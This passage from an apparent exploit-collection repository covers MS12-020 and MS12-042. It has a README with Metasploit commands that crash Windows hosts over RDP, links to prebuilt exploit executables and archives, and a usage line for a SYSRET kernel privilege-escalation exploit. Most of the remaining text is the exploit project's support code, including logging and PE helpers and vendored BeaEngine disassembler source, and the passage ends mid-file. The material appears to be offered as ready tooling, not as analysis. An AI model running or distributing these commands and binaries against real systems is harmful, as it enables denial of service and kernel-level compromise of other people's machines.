remote code execution; the public exploits, including the msf module below, only crash the target. The flaw is
reached during connection setup, so no credentials are needed, only a reachable port 3389.

Vulnerability reference:
* [MS12-020](https://technet.microsoft.com/library/security/ms12-020)
* [CVE-2012-0002](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0002)

## msf Usage
[YouTube-MS12-020 RDP Vulnerability](https://www.youtube.com/watch?v=8FhEK296jPg)

```
msf > search ms12_020
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.1.35
msf auxiliary(ms12_020_maxchannelids) > run
```

![msf](msf.png)
![blue-death](blue-death.png)

## References
* [Exploiting the RDP denial-of-service vulnerability (MS12-020) with msf (Chinese)](http://blog.sina.com.cn/s/blog_4bf0ab590101gsq7.html)
* [In-depth analysis report on CVE-2012-0002 (MS12-020) (Chinese)](http://max.book118.com/html/2016/0314/37644373.shtm)
* [http://www.7kb.org/524.html](http://www.7kb.org/524.html)
--------------------------------------------------------------------------------
/MS12-020/blue-death.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/blue-death.png
--------------------------------------------------------------------------------
/MS12-020/ms12-020.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/ms12-020.exe
--------------------------------------------------------------------------------
/MS12-020/ms12-020_.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/ms12-020_.exe
--------------------------------------------------------------------------------
/MS12-020/msf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/msf.png
--------------------------------------------------------------------------------
/MS12-020/rdpclient.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/rdpclient.rar
--------------------------------------------------------------------------------
/MS12-042/README.md:
--------------------------------------------------------------------------------
# MS12-042
```
The x64 Windows kernel does not safely handle a SYSRET to a non-canonical user-mode address. On Intel CPUs the
resulting #GP fault is raised while still in ring 0 but with the user-controlled RSP already loaded, which a local
user can trigger via a crafted application (the bug was reached through the User Mode Scheduler) to run arbitrary
code in kernel mode, aka "User Mode Scheduler Memory Corruption Vulnerability." Intel CPUs only; AMD CPUs are not affected.
```

Vulnerability reference:
* [MS12-042](https://technet.microsoft.com/library/security/ms12-042)
* [CVE-2012-0217](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217)

## Usage
```
c:\> MS12-042.exe -pid xxx
```
* [YouTube](https://www.youtube.com/watch?v=whRRFOm-DLI&feature=youtu.be)

![win7](win7.png)

--------------------------------------------------------------------------------
/MS12-042/Sysret(MS12-042).zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/Sysret(MS12-042).zip
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/junk.suo
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/MinHook/MinHook.x64.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/junk/MinHook/MinHook.x64.lib
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/ReadMe.txt:
--------------------------------------------------------------------------------
========================================================================
    CONSOLE APPLICATION : junk Project Overview
========================================================================

AppWizard has created this junk application for you.

This file contains a summary of what you will find in each of the files that
make up your junk application.


junk.vcxproj
    This is the main project file for VC++ projects generated using an Application Wizard.
    It contains information about the version of Visual C++ that generated the file, and
    information about the platforms, configurations, and project features selected with the
    Application Wizard.

junk.vcxproj.filters
    This is the filters file for VC++ projects generated using an Application Wizard.
    It contains information about the association between the files in your project
    and the filters. This association is used in the IDE to show grouping of files with
    similar extensions under a specific node (for e.g. ".cpp" files are associated with the
    "Source Files" filter).

junk.cpp
    This is the main application source file.

/////////////////////////////////////////////////////////////////////////////
Other standard files:

StdAfx.h, StdAfx.cpp
    These files are used to build a precompiled header (PCH) file
    named junk.pch and a precompiled types file named StdAfx.obj.

/////////////////////////////////////////////////////////////////////////////
Other notes:

AppWizard uses "TODO:" comments to indicate parts of the source code you
should add to or customize.

/////////////////////////////////////////////////////////////////////////////
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/junk.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hpp;hxx;hm;inl;inc;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
Source Files
Source Files
Source Files
Source Files
Source Files
Source Files
Source Files
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/junk.vcxproj.user:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/log.cpp:
--------------------------------------------------------------------------------
#include "log.h"

VOID
REPORT_ERROR(
    IN PCHAR Function,
    OUT PERRORINFO ErrorInfo
    )
{
    // Read the thread's last error once, before any call below can clobber it,
    // and let REPORT_ERROR_EX do the formatting.
    DWORD dwLastError = GetLastError();

    REPORT_ERROR_EX( Function,
                     dwLastError,
                     ErrorInfo);
}

VOID
REPORT_ERROR_EX(
    IN PCHAR Function,
    IN DWORD dwErrorNumber,
    OUT PERRORINFO ErrorInfo
    )
{
    BOOL bErrorHandle;
    HMODULE hErrorDllHandle;

    ErrorInfo->dwErrorNum = dwErrorNumber;
    bErrorHandle = FormatMessage( FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
                                  NULL,
                                  ErrorInfo->dwErrorNum,
                                  MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT),
                                  ErrorInfo->ErrorMsg,
                                  256,
                                  NULL);
    if ( bErrorHandle == FALSE )
    {
        // Not a system error code: retry against netmsg.dll, which carries the
        // message table for network related errors. The module handle has to be
        // passed as the source with FORMAT_MESSAGE_FROM_HMODULE; repeating the
        // FROM_SYSTEM call with a NULL source (as the original did) can never succeed.
        hErrorDllHandle = LoadLibraryEx( "netmsg.dll",
                                         NULL,
                                         DONT_RESOLVE_DLL_REFERENCES);
        if ( hErrorDllHandle != NULL )
        {
            bErrorHandle = FormatMessage( FORMAT_MESSAGE_FROM_HMODULE | FORMAT_MESSAGE_IGNORE_INSERTS,
                                          hErrorDllHandle,
                                          ErrorInfo->dwErrorNum,
                                          MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT),
                                          ErrorInfo->ErrorMsg,
                                          256,
                                          NULL);
            FreeLibrary( hErrorDllHandle );
        }
    }
    if ( bErrorHandle == FALSE )
    {
        strncpy(ErrorInfo->ErrorMsg,"Unknown Error", 256);
    }

    // allocate memory for the completed error message; the write is bounded so a
    // long function name or message text cannot overrun the 512-byte buffer
    ErrorInfo->CompletErrorMsg = (CHAR *) GlobalAlloc( GMEM_FIXED, 512 );
    if ( ErrorInfo->CompletErrorMsg != NULL )
    {
        _snprintf_s( ErrorInfo->CompletErrorMsg, 512, _TRUNCATE, "%s failed with error %d (%s)\n",
                     Function, ErrorInfo->dwErrorNum, ErrorInfo->ErrorMsg );
        DEBUG_PRINTF(L_ERROR,"%s",ErrorInfo->CompletErrorMsg);
    }
}


VOID
DEBUG_PRINTF(
    IN LEVEL Level,
    IN PCHAR Format,
    IN ...
    )
{
    CHAR Buffer[1024] = {0};
    va_list Args;

    va_start(Args, Format);
    vsnprintf_s(Buffer, sizeof Buffer, _TRUNCATE, Format, Args);
    va_end(Args);

#ifdef __DEBUG__
    // Level prefix: [?] debug, [+] info, [*] warning, [!] error (with a bell)
    switch (Level) {
        case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break;
        case L_INFO:  fprintf(stdout, "[+] %s\n", Buffer); break;
        case L_WARN:  fprintf(stderr, "[*] %s\n", Buffer); break;
        case L_ERROR: fprintf(stderr, "[!] "
                      "%s\n\a", Buffer); break;
    }
    fflush(stdout);
    fflush(stderr);
    return;
#endif

}
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/log.h:
--------------------------------------------------------------------------------
/* include targets assumed: they were blank in the published copy; these are
   the headers the declarations below (DWORD, va_list, fprintf) need */
#include <windows.h>
#include <stdio.h>
#include <stdarg.h>
#define __DEBUG__
#pragma once

typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;

typedef struct _ERRORINFO {
    DWORD dwErrorNum;
    CHAR ErrorMsg[256];
    CHAR *CompletErrorMsg;
} ERRORINFO, *PERRORINFO;

VOID
DEBUG_PRINTF(
    IN LEVEL Level,
    IN PCHAR Format,
    IN ...
    );

VOID
REPORT_ERROR_EX(
    IN PCHAR Function,
    IN DWORD dwErrorNumber,
    OUT PERRORINFO ErrorInfo
    );

VOID
REPORT_ERROR(
    IN PCHAR Function,
    OUT PERRORINFO ErrorInfo
    );
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/peutil.h:
--------------------------------------------------------------------------------
/* include targets assumed: they were blank in the published copy; windows.h
   supplies the IMAGE_* PE structures used by the macros below */
#include <windows.h>
#include <stdio.h>
#pragma once

/* Offsets into a mapped PE image, all derived from the DOS header's e_lfanew */
#define SIZE_OF_NT_SIGNATURE sizeof(IMAGE_NT_SIGNATURE)
#define NTSIGNATURE(a)  ((LPVOID)((BYTE *)a + ((PIMAGE_DOS_HEADER)a)->e_lfanew))
#define PEFHDROFFSET(a) ((LPVOID)((BYTE *)a + ((PIMAGE_DOS_HEADER)a)->e_lfanew + SIZE_OF_NT_SIGNATURE))
#define OPTHDROFFSET(a) ((LPVOID)((BYTE *)a + ((PIMAGE_DOS_HEADER)a)->e_lfanew + SIZE_OF_NT_SIGNATURE + sizeof (IMAGE_FILE_HEADER)))
#define SECHDROFFSET(a) ((LPVOID)((BYTE *)a + ((PIMAGE_DOS_HEADER)a)->e_lfanew + SIZE_OF_NT_SIGNATURE + sizeof(IMAGE_FILE_HEADER) + sizeof(IMAGE_OPTIONAL_HEADER)))
/* no trailing ';' here, so the macro can be used inside an expression */
#define NUMOFSECTION(a) ((DWORD)((PIMAGE_FILE_HEADER) PEFHDROFFSET(a))->NumberOfSections)
#define IsBitSet(val, bit) \
    ((val) & (1 << (bit)))


PVOID
PeGetCodeSectionAddress(
    IN PVOID BaseAddress
    );

DWORD
PeGetCodeSectionSize(
    IN PVOID BaseAddress
    );
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/peutils.cpp:
--------------------------------------------------------------------------------
#include "peutil.h"

/* WTF _WIN64 is not defined!!!! */
/* The 64-bit optional header is used unconditionally: this code only handles x64 images. */
PVOID
PeGetCodeSectionAddress(
    IN PVOID BaseAddress
    )
{
    PIMAGE_OPTIONAL_HEADER64 pOptionalHeader;

    // BaseOfCode is an RVA; rebase it on the image's load address
    pOptionalHeader = (PIMAGE_OPTIONAL_HEADER64) OPTHDROFFSET(BaseAddress);
    return (PVOID)(pOptionalHeader->BaseOfCode + (ULONG_PTR)BaseAddress);
}

DWORD
PeGetCodeSectionSize(
    IN PVOID BaseAddress
    )
{
    PIMAGE_OPTIONAL_HEADER64 pOptionalHeader;

    pOptionalHeader = (PIMAGE_OPTIONAL_HEADER64) OPTHDROFFSET(BaseAddress);
    return pOptionalHeader->SizeOfCode;
}
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sources/beaengineSources/BeaEngine.c:
--------------------------------------------------------------------------------
/*
 * BeaEngine 4 - x86 & x86-64 disassembler library
 *
 * Copyright 2006-2010, BeatriX
 * File coded by BeatriX
 *
 * This file is part of BeaEngine.
 *
 * BeaEngine is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * BeaEngine is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public License
 * along with BeaEngine. If not, see <http://www.gnu.org/licenses/>. */

/* standard C headers assumed: the include targets were blank in the published copy */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include "../include/beaengine/BeaEngine.h"
#include "Includes/protos.h"
#include "Includes/internal_datas.h"
#include "Includes/instr_set/Data_opcode.h"
#include "Includes/instr_set/opcodes_A_M.c"
#include "Includes/instr_set/opcodes_N_Z.c"
#include "Includes/instr_set/opcodes_Grp1.c"
#include "Includes/instr_set/opcodes_Grp2.c"
#include "Includes/instr_set/opcodes_Grp3.c"
#include "Includes/instr_set/opcodes_Grp4.c"
#include "Includes/instr_set/opcodes_Grp5.c"
#include "Includes/instr_set/opcodes_Grp6.c"
#include "Includes/instr_set/opcodes_Grp7.c"
#include "Includes/instr_set/opcodes_Grp8.c"
#include "Includes/instr_set/opcodes_Grp9.c"
#include "Includes/instr_set/opcodes_Grp12.c"
#include "Includes/instr_set/opcodes_Grp13.c"
#include "Includes/instr_set/opcodes_Grp14.c"
#include "Includes/instr_set/opcodes_Grp15.c"
#include "Includes/instr_set/opcodes_Grp16.c"
#include "Includes/instr_set/opcodes_FPU.c"
#include "Includes/instr_set/opcodes_MMX.c"
#include "Includes/instr_set/opcodes_SSE.c"
#include "Includes/instr_set/opcodes_AES.c"
#include "Includes/instr_set/opcodes_CLMUL.c"
#include "Includes/instr_set/opcodes_prefixes.c"
#include "Includes/Routines_ModRM.c"
#include "Includes/Routines_Disasm.c"
#include "Includes/BeaEngineVersion.c"

void BeaEngine(void){return;}

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sources/beaengineSources/BeaEngine.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/junk/sources/beaengineSources/BeaEngine.obj
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sources/beaengineSources/CMakeLists.txt:
--------------------------------------------------------------------------------
set (BEA_SOURCES BeaEngine.c)

if (optBUILD_DLL)
    add_library (${BEA_TARGET} SHARED BeaEngine.c)
    set_target_properties (${BEA_TARGET} PROPERTIES COMPILE_FLAGS "-DBUILD_BEA_ENGINE_DLL")
else ()
    add_library (${BEA_TARGET} STATIC BeaEngine.c)
    set_target_properties (${BEA_TARGET} PROPERTIES COMPILE_FLAGS "-DBEA_ENGINE_STATIC")
endif ()

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sources/beaengineSources/Includes/BeaEngineVersion.c:
--------------------------------------------------------------------------------
/* Copyright 2006-2010, BeatriX
 * File coded by BeatriX
 *
 * This file is part of BeaEngine.
 *
 * BeaEngine is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * BeaEngine is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public License
 * along with BeaEngine. If not, see <http://www.gnu.org/licenses/>.
 */
const__ char* __bea_callspec__ BeaEngineVersion(void) {
    return "4.1";
}
const__ char* __bea_callspec__ BeaEngineRevision(void) {
    return "170";
}

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sources/beaengineSources/Includes/instr_set/opcodes_CLMUL.c:
--------------------------------------------------------------------------------
/* Copyright 2006-2009, BeatriX
 * File coded by BeatriX
 *
 * This file is part of BeaEngine.
 *
 * BeaEngine is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * BeaEngine is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public License
 * along with BeaEngine. If not, see <http://www.gnu.org/licenses/>.
 */

/* ====================================================================
 *      0x 0f 3a 44
 * ==================================================================== */
void __bea_callspec__ pclmulqdq_(PDISASM pMyDisasm)
{
    /* ========== 0x66 */
    if (GV.OperandSize == 16) {
        (*pMyDisasm).Prefix.OperandSize = MandatoryPrefix;
        GV.MemDecoration = Arg2dqword;
        (*pMyDisasm).Instruction.Category = CLMUL_INSTRUCTION;

        GV.ImmediatSize = 8;
        GV.SSE_ = 1;
        GxEx(pMyDisasm);
        GV.SSE_ = 0;
        GV.EIP_++;
        if (!Security(0, pMyDisasm)) return;

        (*pMyDisasm).Instruction.Immediat = *((UInt8*)(UIntPtr) (GV.EIP_- 1));

        if ((*pMyDisasm).Instruction.Immediat == 0) {
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "pclmullqlqdq ");
            #endif
        }
        else if ((*pMyDisasm).Instruction.Immediat == 0x01 ) {
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "pclmulhqlqdq ");
            #endif
        }
        else if ((*pMyDisasm).Instruction.Immediat == 0x10 ) {
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "pclmullqhqdq ");
            #endif
        }
        else if ((*pMyDisasm).Instruction.Immediat == 0x011 ) {
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "pclmulhqhqdq ");
            #endif
        }
        else {
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "pclmulqdq ");
            #endif
            GV.third_arg = 1;
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) CopyFormattedNumber(pMyDisasm, (char*) (*pMyDisasm).Argument3.ArgMnemonic, "%.2X",(Int64) *((UInt8*)(UIntPtr) (GV.EIP_- 1)));
            #endif
            (*pMyDisasm).Argument3.ArgType = CONSTANT_TYPE+ABSOLUTE_;
            (*pMyDisasm).Argument3.ArgSize = 8;
        }
    }
    else {
        FailDecode(pMyDisasm);
    }
}

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sources/beaengineSources/Includes/instr_set/opcodes_Grp16.c:
--------------------------------------------------------------------------------
/* Copyright 2006-2009, BeatriX
 * File coded by BeatriX
 *
 * This file is part of BeaEngine.
 *
 * BeaEngine is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * BeaEngine is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public License
 * along with BeaEngine. If not, see <http://www.gnu.org/licenses/>.
 */

/* ====================================================================
 *
 * ==================================================================== */
void __bea_callspec__ G16_(PDISASM pMyDisasm)
{
    GV.REGOPCODE = ((*((UInt8*)(UIntPtr) (GV.EIP_+1))) >> 3) & 0x7;
    if (GV.REGOPCODE == 0) {
        MOD_RM(&(*pMyDisasm).Argument2, pMyDisasm);
        if (GV.MOD_!= 0x3) {
            GV.MemDecoration = Arg2byte;
            (*pMyDisasm).Instruction.Category = SSE_INSTRUCTION+CACHEABILITY_CONTROL;
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "prefetchNTA ");
            #endif
        }
        else {
            FailDecode(pMyDisasm);
        }
    }
    else if (GV.REGOPCODE == 1) {
        MOD_RM(&(*pMyDisasm).Argument2, pMyDisasm);
        if (GV.MOD_!= 0x3) {
            GV.MemDecoration = Arg2byte;
            (*pMyDisasm).Instruction.Category = SSE_INSTRUCTION+CACHEABILITY_CONTROL;
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "prefetchT0 ");
            #endif
        }
        else {
            FailDecode(pMyDisasm);
        }

    }
    else if (GV.REGOPCODE == 2) {
        MOD_RM(&(*pMyDisasm).Argument2, pMyDisasm);
        if (GV.MOD_!= 0x3) {
            GV.MemDecoration = Arg2byte;
            (*pMyDisasm).Instruction.Category = SSE_INSTRUCTION+CACHEABILITY_CONTROL;
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "prefetchT1 ");
            #endif
        }
        else {
            FailDecode(pMyDisasm);
        }

    }
    else if (GV.REGOPCODE == 3) {
        MOD_RM(&(*pMyDisasm).Argument2, pMyDisasm);
        if (GV.MOD_!= 0x3) {
            GV.MemDecoration = Arg2byte;
            (*pMyDisasm).Instruction.Category = SSE_INSTRUCTION+CACHEABILITY_CONTROL;
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "prefetchT2 ");
            #endif
        }
        else {
            FailDecode(pMyDisasm);
        }

    }

    else {
        FailDecode(pMyDisasm);
    }
    GV.EIP_+= GV.DECALAGE_EIP+2;
}

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sources/beaengineSources/Includes/instr_set/opcodes_Grp4.c:
--------------------------------------------------------------------------------
/* Copyright 2006-2009, BeatriX
 * File coded by BeatriX
 *
 * This file is part of BeaEngine.
 *
 * BeaEngine is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * BeaEngine is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public License
 * along with BeaEngine. If not, see <http://www.gnu.org/licenses/>.
 */

/* ====================================================================
 *      0feh
 * ==================================================================== */
void __bea_callspec__ G4_Eb(PDISASM pMyDisasm)
{
    GV.REGOPCODE = ((*((UInt8*)(UIntPtr) (GV.EIP_+1))) >> 3) & 0x7;
    if (GV.REGOPCODE == 0) {
        if ((*pMyDisasm).Prefix.LockPrefix == InvalidPrefix) {
            (*pMyDisasm).Prefix.LockPrefix = InUsePrefix;
        }
        (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+ARITHMETIC_INSTRUCTION;
        #ifndef BEA_LIGHT_DISASSEMBLY
            (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "inc ");
        #endif
        Eb(pMyDisasm);
        FillFlags(pMyDisasm, 40);
    }
    else if (GV.REGOPCODE == 1) {
        if ((*pMyDisasm).Prefix.LockPrefix == InvalidPrefix) {
            (*pMyDisasm).Prefix.LockPrefix = InUsePrefix;
        }
        (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+ARITHMETIC_INSTRUCTION;
        #ifndef BEA_LIGHT_DISASSEMBLY
            (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "dec ");
        #endif
        Eb(pMyDisasm);
        FillFlags(pMyDisasm, 30);
    }
    else {
        FailDecode(pMyDisasm);
    }
}


--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sources/beaengineSources/Includes/instr_set/opcodes_Grp8.c:
--------------------------------------------------------------------------------
/* Copyright 2006-2009, BeatriX
 * File coded by BeatriX
 *
 * This file is part of BeaEngine.
 *
 * BeaEngine is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * BeaEngine is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public License
 * along with BeaEngine. If not, see <http://www.gnu.org/licenses/>. */

/* ====================================================================
 *      0fbah
 * ==================================================================== */
void __bea_callspec__ G8_EvIb(PDISASM pMyDisasm)
{
    GV.REGOPCODE = ((*((UInt8*)(UIntPtr) (GV.EIP_+1))) >> 3) & 0x7;
    EvIb(pMyDisasm);
    if (GV.REGOPCODE == 4) {
        (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+BIT_UInt8;
        #ifndef BEA_LIGHT_DISASSEMBLY
            (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "bt ");
        #endif
        (*pMyDisasm).Argument1.AccessMode = READ;
        FillFlags(pMyDisasm, 11);
    }
    else if (GV.REGOPCODE == 5) {
        if ((*pMyDisasm).Prefix.LockPrefix == InvalidPrefix) {
            (*pMyDisasm).Prefix.LockPrefix = InUsePrefix;
        }
        (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+BIT_UInt8;
        #ifndef BEA_LIGHT_DISASSEMBLY
            (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "bts ");
        #endif
        (*pMyDisasm).Argument1.AccessMode = READ;
        FillFlags(pMyDisasm, 11);
    }
    else if (GV.REGOPCODE == 6) {
        if ((*pMyDisasm).Prefix.LockPrefix == InvalidPrefix) {
            (*pMyDisasm).Prefix.LockPrefix = InUsePrefix;
        }
        (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+BIT_UInt8;
        #ifndef BEA_LIGHT_DISASSEMBLY
            (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "btr ");
        #endif
        (*pMyDisasm).Argument1.AccessMode = READ;
        FillFlags(pMyDisasm, 11);
    }
    else if (GV.REGOPCODE == 7) {
        if ((*pMyDisasm).Prefix.LockPrefix == InvalidPrefix) {
            (*pMyDisasm).Prefix.LockPrefix = InUsePrefix;
        }
        (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+BIT_UInt8;
        #ifndef BEA_LIGHT_DISASSEMBLY
            (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "btc ");
        #endif
        (*pMyDisasm).Argument1.AccessMode = READ;
        FillFlags(pMyDisasm, 11);
    }
    else {
        FailDecode(pMyDisasm);
    }
}

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sources/beaengineSources/Includes/instr_set/opcodes_Grp9.c:
--------------------------------------------------------------------------------
/* Copyright 2006-2009, BeatriX
 * File coded by BeatriX
 *
 * This file is part of BeaEngine.
 *
 * BeaEngine is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * BeaEngine is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public License
 * along with BeaEngine. If not, see <http://www.gnu.org/licenses/>.
 */


/* ====================================================================
 *      0fc7h
 * ==================================================================== */
void __bea_callspec__ G9_(PDISASM pMyDisasm)
{
    GV.REGOPCODE = ((*((UInt8*)(UIntPtr) (GV.EIP_+1))) >> 3) & 0x7;
    GV.MemDecoration = Arg2qword;
    MOD_RM(&(*pMyDisasm).Argument2, pMyDisasm);
    if (GV.REGOPCODE == 1) {
        if (GV.REX.W_ == 1) {
            GV.MemDecoration = Arg2dqword;
            (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+DATA_TRANSFER;
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "cmpxchg16b ");
            #endif
            (*pMyDisasm).Argument1.ArgType = REGISTER_TYPE+GENERAL_REG+REG0+REG2;
            (*pMyDisasm).Argument1.ArgSize = 128;
            (*pMyDisasm).Argument1.AccessMode = READ;
            FillFlags(pMyDisasm, 23);
            GV.EIP_ += GV.DECALAGE_EIP+2;
        }
        else {
            (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+DATA_TRANSFER;
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "cmpxchg8b ");
            #endif
            (*pMyDisasm).Argument1.ArgType = REGISTER_TYPE+GENERAL_REG+REG0+REG2;
            (*pMyDisasm).Argument1.ArgSize = 64;
            (*pMyDisasm).Argument1.AccessMode = READ;
            FillFlags(pMyDisasm, 23);
            GV.EIP_ += GV.DECALAGE_EIP+2;
        }
    }
    else if (GV.REGOPCODE == 6) {
        (*pMyDisasm).Instruction.Category = VM_INSTRUCTION;
        if (GV.OperandSize == 16) {
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "vmclear ");
            #endif
        }
        else if (GV.PrefRepe == 1) {
